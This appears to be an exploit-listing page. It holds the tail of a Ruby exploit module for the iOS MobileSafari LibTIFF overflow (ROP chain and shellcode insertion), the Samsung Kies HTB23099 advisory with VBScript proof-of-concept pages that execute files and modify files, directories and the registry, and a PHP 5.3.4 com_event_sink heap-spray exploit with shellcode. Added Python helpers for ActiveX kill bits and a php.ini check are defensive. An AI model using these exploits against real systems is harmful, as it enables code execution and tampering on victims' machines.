        # >> mov r2, r8
        hehe[ 92, 4] = [ hehe.length ].pack("V")

        # Its a magic leoplurodon!
        # It has spoken!
        # It has shown us the way!
        # >> bl _memcpy

        # Its just over this bridge, Charlie!
        # This magical bridge!
        # >> ldr r3, [r4, #32]
        # >> ldrt r3, [pc], r3, lsr #30
        # >> str r3, [r4, #32]
        # >> ldr r3, [r4, #36]
        # >> ldrt r3, [pc], r3, lsr #30
        # >> str r3, [r4, #36]
        # >> ldr r3, [r4, #40]
        # >> ldrt r3, [pc], r3, lsr #30
        # >> str r3, [r4, #40]
        # >> ldr r3, [r4, #44]
        # >> ldrt r3, [pc], r3, lsr #30
        # >> str r3, [r4, #44]

        # We made it to candy mountain!
        # Go inside Charlie!
        # sub sp, r7, #0x14
        hehe[116, 4] = [ targ['Heap'] + 44 + 0x14 ].pack("V")

        # Goodbye Charlie!
        # ;; targ['Heap'] + 0x48 becomes the stack pointer
        # >> ldmia sp!, {r8, r10}
        # Hey, what the...!
        # >> ldmia sp!, {r4, r5, r6, r7, pc}

        # Return back to the copied heap data
        hehe[192, 4] = [ targ['Heap'] + 196 ].pack("V")

        # Insert our actual shellcode at heap location + 196
        hehe[196, payload.encoded.length] = payload.encoded

        tiff << hehe
      end

    end

    Source: Apple iOS MobileSafari LibTIFF Buffer Overflow
  9. Samsung Kies 2.3.2.12054_20 Multiple Vulnerabilities

    Advisory ID: HTB23099
    Product: Samsung Kies
    Vendor: Samsung Electronics
    Vulnerable Version(s): 2.3.2.12054_20 and probably prior
    Tested Version: 2.3.2.12054_20
    Vendor Notification: June 25, 2012
    Public Disclosure: October 15, 2012
    Vulnerability Type: NULL Pointer Dereference [CWE-476], Improper Access Control [CWE-284], Improper Access Control [CWE-284], Improper Access Control [CWE-284], Improper Access Control [CWE-284]
    CVE References: CVE-2012-3806, CVE-2012-3807, CVE-2012-3808, CVE-2012-3809, CVE-2012-3810
    CVSSv2 Base Scores: 4.3 (AV:N/AC:M/Au:N/C:N/I:N/A:P), 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P), 5.8 (AV:N/AC:M/Au:N/C:N/I:P/A:P), 5.8 (AV:N/AC:M/Au:N/C:N/I:P/A:P), 5.8 (AV:N/AC:M/Au:N/C:N/I:P/A:P)
    Solution Status: Fixed by Vendor
    Risk Level: Medium
    Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ )

    -----------------------------------------------------------------------------------------------

    Advisory Details:

    High-Tech Bridge Security Research Lab has discovered multiple vulnerabilities in the Samsung Kies synchronization utility that allow a remote attacker to compromise the affected system, execute and modify arbitrary files, modify arbitrary directories and modify the System Registry with the privileges of the current user.

    1) Null Pointer Dereference in Samsung Kies: CVE-2012-3806

    The vulnerability exists due to a null pointer dereference error in the GetDataTable() method within the Samsung.DeviceService.DCA.DeviceDataParagonATGM.1 ActiveX control (DCAPARAGONGM.dll, GUID {7650BC47-036D-4D5B-95B4-9D622C8D00A4}, located by default in "C:\Program Files(x86)\Samsung\Kies\External\DeviceModules\").

    A remote attacker can pass a "tagDATATABLE_SUID" argument equal to 0 to the GetDataTable() method and raise an ACCESS_VIOLATION exception on a MOV EDX,[EAX] instruction, as EAX was previously zeroed by an unexpected NULL value in the memory region pointed to by ECX:

    Disassembly:
    --------------------------------------------------
    2A22B95   MOV ECX,[EBP+10]
    2A22B98   MOV EAX,[ECX]
    2A22B9A   MOV EDX,[EAX]       // Crash through Null Pointer Dereference
    2A22B9C   PUSH 0
    2A22B9E   PUSH 0
    2A22BA0   PUSH 2A71E68
    2A22BA5   PUSH EAX
    2A22BA6   MOV EAX,[EDX+50]
    2A22BA9   CALL EAX

    Registers:
    --------------------------------------------------
    EIP 02A22B9A
    EAX 00000000
    EBX 02A66774 -> 029E58F0
    ECX 0022EBC0 -> 00000000
    EDX 006DFCE2 -> 00030000
    EDI 00000000
    ESI 00000000
    EBP 0022EB5C -> 0022EB7C
    ESP 0022EB38 -> F2D508FE

    The following Proof of Concept code causes a browser to crash:

    <html>
    <!-- (c)oded by Frederic Bourla, High-Tech Bridge -->
    <head>
    <title>Multiple vulnerabilities in Samsung Kies v.2.3.2.12054_20</title>
    </head>
    <script language='vbscript'>
    Sub daPoC()
      arg1=0
      daTarget.GetDataTable arg1
    End Sub
    </script>
    <body>
    <h3>Multiple vulnerabilities in Samsung Kies v.2.3.2.12054_20</h3>
    <h4>Null Pointer Dereference PoC</h4>
    <hr>
    This simple PoC will crash Internet Explorer.<BR><BR>
    <input language=VBScript onclick=daPoC() type=button value="Proof of Concept">
    </body>
    <object classid='clsid:7650BC47-036D-4D5B-95B4-9D622C8D00A4' id='daTarget'></object>
    </html>

    2) Arbitrary File Execution in Samsung Kies: CVE-2012-3807

    The CmdAgent.dll library, located by default in "C:\Program Files (x86)\Samsung\Kies\External\FirmwareUpdate\", has numerous arbitrary file execution vulnerabilities present in "CmdAgentLib" (GUID: {1FA56F8D-A66E-4ABD-9BC9-6F61469E59AD}), in particular in the 'ICommandAgent' interface of the "CommandAgent" class (GUID: {C668B648-A2BD-432C-854F-C8C0A275E1F1}). This default "ICommandAgent" interface has multiple functions and methods, and most of them can be leveraged by an untrusted source.

    Arbitrary File Execution:
    Run          => Vulnerable
    RunAt        => Initial Exploit Test failed
    RunAtNotExit => Initial Exploit Test failed
    RunNotExit   => Vulnerable

    Arbitrary File Execution Proof of Concept:

    <html>
    <!-- (c)oded by Frederic Bourla, High-Tech Bridge -->
    <head>
    <title>Multiple vulnerabilities in Samsung Kies v.2.3.2.12054_20</title>
    </head>
    <script language='vbscript'>
    Sub daPoC()
      daFile="iexplore https://www.htbridge.com/advisory/HTB23099"
      daTarget.Run daFile
    End Sub
    </script>
    <body>
    <h3>Multiple vulnerabilities in Samsung Kies v.2.3.2.12054_20</h3>
    <h4>Arbitrary File Execution PoC</h4>
    <hr>
    This simple PoC will spawn IE and display more information about the vulnerability.<BR><BR>
    <input language=VBScript onclick=daPoC() type=button value="Proof of Concept">
    </body>
    <object classid='clsid:C668B648-A2BD-432C-854F-C8C0A275E1F1' id='daTarget'></object>
    </html>

    3) Arbitrary File Modification in Samsung Kies: CVE-2012-3808

    The CmdAgent.dll library, located by default in "C:\Program Files (x86)\Samsung\Kies\External\FirmwareUpdate\", has numerous arbitrary file modification vulnerabilities present in "CmdAgentLib" (GUID: {1FA56F8D-A66E-4ABD-9BC9-6F61469E59AD}), in particular in the 'ICommandAgent' interface of the "CommandAgent" class (GUID: {C668B648-A2BD-432C-854F-C8C0A275E1F1}). This default "ICommandAgent" interface has multiple functions and methods, and most of them can be leveraged by an untrusted source.

    Arbitrary File Modification:
    FileCopy         => Vulnerable
    FileCopySync     => Vulnerable
    FileDelete       => Vulnerable
    FileMove         => Vulnerable
    FileMoveExReboot => Initial Exploit Test failed
    FileMoveSync     => Vulnerable

    Arbitrary File Modification Proof of Concept:

    <html>
    <!-- (c)oded by Frederic Bourla, High-Tech Bridge -->
    <head>
    <title>Multiple vulnerabilities in Samsung Kies v.2.3.2.12054_20</title>
    </head>
    <script language='vbscript'>
    Set daShell = CreateObject( "WScript.Shell" )
    daRoot=daShell.ExpandEnvironmentStrings("%SystemRoot%")
    daFileCopySource=daRoot & "\System32\drivers\etc\hosts"
    daProfile=daShell.ExpandEnvironmentStrings("%USERPROFILE%")
    daFileCopyDest=daprofile & "\Desktop\hosts"
    daFileMoveDest=daprofile & "\Desktop\hosts.backup"
    Sub daPoC()
      daTarget.FileCopy daFileCopySource, daFileCopyDest
    End Sub
    Sub daPoC2()
      daTarget.FileMoveSync daFileCopyDest, daFileMoveDest
    End Sub
    Sub daPoC3()
      daTarget.FileDelete daFileMoveDest
    End Sub
    </script>
    <body>
    <h3>Multiple vulnerabilities in Samsung Kies v.2.3.2.12054_20</h3>
    <h4>Arbitrary File Modification PoC</h4>
    <hr>
    This simple PoC will copy your <script language='vbscript'>document.write(daFileCopySource)</script> file into your desktop.<BR><BR>
    <input language=VBScript onclick=daPoC() type=button value="Proof of Concept">
    <hr>
    This simple PoC will move your <script language='vbscript'>document.write(daFileCopyDest)</script> file into <script language='vbscript'>document.write(daFileMoveDest)</script>.<BR><BR>
    <input language=VBScript onclick=daPoC2() type=button value="Proof of Concept">
    <hr>
    This simple PoC will delete <script language='vbscript'>document.write(daFileMoveDest)</script>.<BR><BR>
    <input language=VBScript onclick=daPoC3() type=button value="Proof of Concept">
    </body>
    <object classid='clsid:C668B648-A2BD-432C-854F-C8C0A275E1F1' id='daTarget'></object>
    </html>

    4) Arbitrary Directory Modification in Samsung Kies: CVE-2012-3809

    The CmdAgent.dll library, located by default in "C:\Program Files
(x86)\Samsung\Kies\External\FirmwareUpdate\", has numerous arbitrary directory modification vulnerabilities present in "CmdAgentLib" (GUID: {1FA56F8D-A66E-4ABD-9BC9-6F61469E59AD}), in particular in the 'ICommandAgent' interface of the "CommandAgent" class (GUID: {C668B648-A2BD-432C-854F-C8C0A275E1F1}). This default "ICommandAgent" interface has multiple functions and methods, and most of them can be leveraged by an untrusted source. Arbitrary Directory Modification: DirCreate => Vulnerable DirDelete => Vulnerable Arbitrary Directory Modification Proof of Concept: <html> <!-- (c)oded by Frederic Bourla, High-Tech Bridge --> <head> <title>Multiple vulnerabilities in Samsung Kies v.2.3.2.12054_20</title> </head> <script language='vbscript'> Set daShell = CreateObject( "WScript.Shell" ) daProfile=daShell.ExpandEnvironmentStrings("%USERPROFILE%") daDir=daprofile & "\Desktop\FRoGito" Sub daPoC() daTarget.DirCreate daDir End Sub Sub daPoC2() daTarget.DirDelete daDir End Sub </script> <body> <h3>Multiple vulnerabilities in Samsung Kies v.2.3.2.12054_20</h3> <h4>Arbitrary Directory Modification PoC</h4> <hr> This simple PoC will create the <script language='vbscript'>document.write(daDir)</script> directory.<BR><BR> <input language=VBScript onclick=daPoC() type=button value="Proof of Concept"> <hr> This simple PoC will delete the <script language='vbscript'>document.write(daDir)</script> directory.<BR><BR> <input language=VBScript onclick=daPoC2() type=button value="Proof of Concept"> </body> <object classid='clsid:C668B648-A2BD-432C-854F-C8C0A275E1F1' id='daTarget'></object> </html> 5) Arbitrary Registry Modification in Samsung Kies: CVE-2012-3810 The CmdAgent.dll library, located by default in "C:\Program Files (x86)\Samsung\Kies\External\FirmwareUpdate\", has numerous Registry modification vulnerabilities present in "CmdAgentLib" (GUID: {1FA56F8D-A66E-4ABD-9BC9-6F61469E59AD}), in particular in the 'ICommandAgent' interface of the "CommandAgent" class (GUID: 
{C668B648-A2BD-432C-854F-C8C0A275E1F1}). This default "ICommandAgent" interface has multiple functions and methods, and most of them can be leveraged by an untrusted source. Arbitrary Registry Modification: RegiCreateKey => Vulnerable RegiDeleteKey => Vulnerable RegiDeleteTree => Vulnerable RegiDeleteValue => Vulnerable RegiSetValueInt => Vulnerable RegiSetValueInt64 => Vulnerable RegiSetValueString => Vulnerable RegiSetValueString64 => Vulnerable Arbitrary Registry Modification Proof of Concept: <html> <!-- (c)oded by Frederic Bourla, High-Tech Bridge --> <head> <title>Multiple vulnerabilities in Samsung Kies v.2.3.2.12054_20</title> </head> <script language="vbscript"> daReg = "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\FRoGito" daValueStrName = "PoC_str" daValueStr = "frederic.bourla@htbridge.com" daValueIntName = "PoC_int" daValueInt = 8080 Sub daPoC() daTarget.RegiCreateKey daReg End Sub Sub daPoC2() daTarget.RegiSetValueString daReg, daValueStrName, daValueStr End Sub Sub daPoC3() daTarget.RegiSetValueInt daReg, daValueIntName, daValueInt End Sub Sub daPoC4() daTarget.RegiDeleteValue daReg, daValueStrName daTarget.RegiDeleteValue daReg, daValueIntName End Sub Sub daPoC5() daTarget.RegiDeleteKey daReg End Sub </script> <body> <h3>Multiple vulnerabilities in Samsung Kies v.2.3.2.12054_20</h3> <h4>Arbitrary Registry Modification PoC</h4> <hr> This simple PoC will create the HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\FRoGito registry key.<BR><BR> <input language=VBScript onclick=daPoC() type=button value="Proof of Concept"> <hr> This simple PoC will create the string value 'PoC_str' initialized to 'frederic.bourla@htbridge.com' in the HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\FRoGitoregistry key.<BR><BR> <input language=VBScript onclick=daPoC2() type=button value="Proof of Concept"> <hr> This simple PoC will create the int value 'PoC_int' initialized to 0x1F90 in the 
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\FRoGito registry key. <BR><BR> <input language=VBScript onclick=daPoC3() type=button value="Proof of Concept"> <hr> This simple PoC will delete both string and hex values from the HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\FRoGito registry key <BR><BR> <input language=VBScript onclick=daPoC4() type=button value="Proof of Concept"> <hr> This simple PoC will delete the HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\FRoGito registry key. <BR><BR> <input language=VBScript onclick=daPoC5() type=button value="Proof of Concept"> </body> <object classid='clsid:C668B648-A2BD-432C-854F-C8C0A275E1F1' id='daTarget'></object> </html> Solution: Upgrade to KIES v2.5.0.12094_27_11 ----------------------------------------------------------------------------------------------- References: [1] High-Tech Bridge Advisory HTB23099 - https://www.htbridge.com/advisory/HTB23099 - Multiple vulnerabilities in Samsung Kies. [2] Samsung Kies - Kies Samsung - Samsung Kies is a freeware software application used to communicate between Windows or Macintosh computers, and more recently-manufactured Samsung mobile phone and tablet computer devices. Kies is Samsung's official tool for Android based devices which allows synchronization and multimedia files management. [3] Common Vulnerabilities and Exposures (CVE) - CVE - Common Vulnerabilities and Exposures (CVE) - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures. [4] Common Weakness Enumeration (CWE) - CWE - Common Weakness Enumeration - targeted to developers and security practitioners, CWE is a formal list of software weakness types. Sursa Samsung Kies 2.3.2.12054_20 Multiple Vulnerabilities
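The advisory's fix is the vendor upgrade. Where that cannot be rolled out at once, the standard Internet Explorer workaround for a control that can be scripted from a web page is the kill bit: a "Compatibility Flags" DWORD with bit 0x400 set under "HKLM\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{CLSID}" (and under the Wow6432Node view for 32-bit controls such as the Kies ones on 64-bit Windows). The script below is an added example, not code from High-Tech Bridge or from Samsung: it writes a .reg file that kill-bits the two control CLSIDs named in the advisory ({7650BC47-...} for the DCA control and {C668B648-...} for the CommandAgent class; the CmdAgentLib GUID is a type library, not a coclass, so it gets no kill bit) and audits a "reg export" of the compatibility key to list which of those CLSIDs still lack the bit. The export it parses is a constructed sample. Caveat: the kill bit only stops IE and other hosts that honour that key from instantiating the control; the DLLs are unchanged, so Kies itself and any other COM client can still load them, and the upgrade remains the real fix.

```python
"""Kill-bit helper for the two ActiveX CLSIDs named in HTB23099.

Added example, not part of the High-Tech Bridge advisory or of Samsung Kies.
Setting Compatibility Flags = 0x400 under the ActiveX Compatibility key stops
Internet Explorer (and other hosts that honour that key) from instantiating a
control; it does not patch the DLL. The CLSIDs come from the advisory; the
.reg export further down is constructed sample input.
"""
import re

KILL_BIT = 0x400

# Control CLSIDs from the advisory. {1FA56F8D-...} is the CmdAgentLib type
# library, not a coclass, so it is deliberately absent.
VULNERABLE_CLSIDS = {
    "{7650BC47-036D-4D5B-95B4-9D622C8D00A4}":
        "Samsung.DeviceService.DCA.DeviceDataParagonATGM.1 (DCAPARAGONGM.dll)",
    "{C668B648-A2BD-432C-854F-C8C0A275E1F1}":
        "CmdAgentLib.CommandAgent (CmdAgent.dll)",
}

# Kies is a 32-bit install, so on 64-bit Windows the 32-bit IE reads the
# Wow6432Node view; write both views so the flag is found either way.
COMPAT_KEYS = (
    r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility",
    r"HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility",
)


def killbit_reg(clsids=VULNERABLE_CLSIDS):
    """Return the text of a .reg file that sets the kill bit for each CLSID."""
    lines = ["Windows Registry Editor Version 5.00", ""]
    for clsid, name in clsids.items():
        for base in COMPAT_KEYS:
            lines += [f"; {name}",
                      f"[{base}\\{clsid}]",
                      f'"Compatibility Flags"=dword:{KILL_BIT:08x}',
                      ""]
    return "\n".join(lines)


_KEY_RE = re.compile(r"^\[(.+)\\(\{[0-9A-Fa-f-]{36}\})\]\s*$")
_FLAGS_RE = re.compile(r'^"Compatibility Flags"=dword:([0-9A-Fa-f]{1,8})\s*$')


def parse_compat_export(text):
    """Map CLSID -> Compatibility Flags from a 'reg export' of the compat key.

    CLSIDs are upper-cased so lookups are case-insensitive; a CLSID present in
    several views keeps the highest flags value seen.
    """
    flags, current = {}, None
    for line in text.splitlines():
        m = _KEY_RE.match(line)
        if m:
            current = m.group(2).upper() if "ActiveX Compatibility" in m.group(1) else None
            continue
        m = _FLAGS_RE.match(line)
        if m and current is not None:
            flags[current] = max(flags.get(current, 0), int(m.group(1), 16))
    return flags


def unprotected(export_text, clsids=VULNERABLE_CLSIDS):
    """CLSIDs from `clsids` whose kill bit is not set in the export."""
    flags = parse_compat_export(export_text)
    return sorted(c for c in clsids if not flags.get(c.upper(), 0) & KILL_BIT)


# Constructed sample export: the DCA control already carries the kill bit, the
# CommandAgent class only has an unrelated flag, and a third CLSID is noise.
SAMPLE_EXPORT = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{7650BC47-036D-4D5B-95B4-9D622C8D00A4}]
"Compatibility Flags"=dword:00000400

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{c668b648-a2bd-432c-854f-c8c0a275e1f1}]
"Compatibility Flags"=dword:00000001

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{00000000-0000-0000-0000-000000000001}]
"Compatibility Flags"=dword:00000400
"""

if __name__ == "__main__":
    print("Missing kill bit:", unprotected(SAMPLE_EXPORT))
    print(killbit_reg())
```

On a real host the input for unprotected() comes from `reg export "HKLM\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility" compat.reg` (open the file with encoding "utf-16", which is what reg.exe writes), and the output of killbit_reg() is imported with reg.exe or regedit from an elevated prompt.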
  10. PHP 5.3.4 Win Com Module Com_sink Exploit

# Exploit Title: PHP 5.3.4 Win Com Module Com_sink Local Exploit
# Google Dork: Nil
# Date: 9/10/2012
# Author: FB1H2S
# Software Link: PHP Windows
# Version: [5.3.4]
# Tested on: Microsoft XP Pro 2002 SP2

<?php
//PHP 5.3.4
//
//$eip ="\x44\x43\x42\x41";
// Pair of 32-bit values repeated through the heap spray: $eip is the value
// that ends up in EIP, $eax the address the sprayed data is expected to sit at.
$eip= "\x4b\xe8\x57\x78";
$eax ="\x80\x01\x8d\x04";
$deodrant="";
$axespray = str_repeat($eip.$eax,0x80); //048d0190
echo strlen($axespray);
echo "PHP 5.3.4 WIN Com Module COM_SINK 0-day\n" ;
echo "By Rahul Sasi : http://twitter.com/fb1h2s\n" ;
echo "Exploit Tested on:\n Microsoft XP Pro 2002 SP2 \n" ;
echo "More Details Here:\n http://www.garage4hackers.com/blogs/8/web-app-remote-code-execution-via-scripting-engines-part-1-local-exploits-php-0-day-394/\n" ;
//19200 ==4B32 4b00
// Heap spray: concatenate the pattern until it covers the target address range.
for($axeeffect=0;$axeeffect<0x4B32;$axeeffect++)
{
    $deodrant.=$axespray;
}
$terminate = "T";
// Keep several copies of the spray alive in arrays so the allocations are not freed.
$u[] =$deodrant;
$r[] =$deodrant.$terminate;
$a[] =$deodrant.$terminate;
$s[] =$deodrant.$terminate;
//$vVar = new VARIANT(0x048d0038+$offset); // This is what we control
// Fake VARIANT whose integer value points into the sprayed region.
$vVar = new VARIANT(0x048d0000+180);
//alert box Shellcode (hardcoded XP SP2 addresses, not portable)
$buffer = "\x90\x90\x90".
"\xB9\x38\xDD\x82\x7C\x33\xC0\xBB".
"\xD8\x0A\x86\x7C\x51\x50\xFF\xd3";
$var2 = new VARIANT(0x41414242);
// com_event_sink() is handed the crafted VARIANT instead of a real COM object.
com_event_sink($vVar,$var2,$buffer);
?>

Source: http://www.bugsearch.net/en/13728/php-534-win-com-module-comsink-exploit.html
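The exploit above only works where script code can reach com_event_sink(), so the practical check on a Windows PHP host is the php.ini: whether COM support is present and whether com_event_sink is listed in disable_functions. The PHP manual documents COM as built into the Windows builds before 5.3.15/5.4.5 (so on the 5.3.4 target there is no extension= line to remove) and as a separate php_com_dotnet.dll afterwards; in both cases disable_functions is what actually blocks the call. The script below is an added example, not code from FB1H2S or from the PHP project: it parses a php.ini text and reports whether com_event_sink() is reachable. The two ini texts are constructed samples, and the com_builtin flag is an assumption used to model the older built-in case.

```python
"""Check whether com_event_sink() is reachable from PHP script, given a php.ini.

Added example; not code from the FB1H2S exploit or from PHP. The exploit above
needs COM support present and com_event_sink() callable. Windows builds before
PHP 5.3.15/5.4.5 carried COM built in (no extension= line to remove); later
builds ship php_com_dotnet.dll. Either way disable_functions is the control
that blocks the call. The ini texts below are constructed samples.
"""
import re

TARGET_FUNCTION = "com_event_sink"
COM_MODULE = "com_dotnet"


def parse_php_ini(text):
    """Return (loaded extension module names, disabled function names).

    Strips ';' comments, unquotes values, accepts repeated extension= lines and
    normalises 'php_com_dotnet.dll', 'ext/php_com_dotnet.dll' and 'com_dotnet'
    to the same module name.
    """
    extensions, disabled = set(), set()
    for raw in text.splitlines():
        line = raw.split(";", 1)[0].strip()
        if "=" not in line:
            continue
        key, value = (part.strip() for part in line.split("=", 1))
        value = value.strip('"').strip("'")
        if key.lower() == "extension":
            base = value.replace("\\", "/").rsplit("/", 1)[-1].lower()
            base = re.sub(r"\.(dll|so)$", "", base)
            base = re.sub(r"^php_", "", base)
            if base:
                extensions.add(base)
        elif key.lower() == "disable_functions":
            disabled |= {f.strip().lower() for f in value.split(",") if f.strip()}
    return extensions, disabled


def com_event_sink_reachable(ini_text, com_builtin=False):
    """True when script code can call com_event_sink() under this php.ini.

    com_builtin=True (an assumption used for modelling) stands for a Windows
    build that carries COM without an extension= line, as on the exploit's
    5.3.4 target; then only disable_functions can block the call.
    """
    extensions, disabled = parse_php_ini(ini_text)
    com_loaded = com_builtin or COM_MODULE in extensions
    return com_loaded and TARGET_FUNCTION not in disabled


# Constructed sample inis (not taken from any real installation).
WEAK_INI = """
[PHP]
extension_dir = "ext"
extension=php_com_dotnet.dll   ; COM bridge enabled
disable_functions =
"""

HARDENED_INI = """
[PHP]
extension_dir = "ext"
;extension=php_com_dotnet.dll
disable_functions = exec, passthru, shell_exec, system, com_event_sink
"""

if __name__ == "__main__":
    for name, ini in (("weak", WEAK_INI), ("hardened", HARDENED_INI)):
        print(f"{name}: reachable = {com_event_sink_reachable(ini)}")
    print("5.3.4-style built-in COM, hardened ini:",
          com_event_sink_reachable(HARDENED_INI, com_builtin=True))
```

Note that disable_functions only takes effect for the main php.ini (not per-directory overrides), so the check should be run against the file `php --ini` reports as loaded.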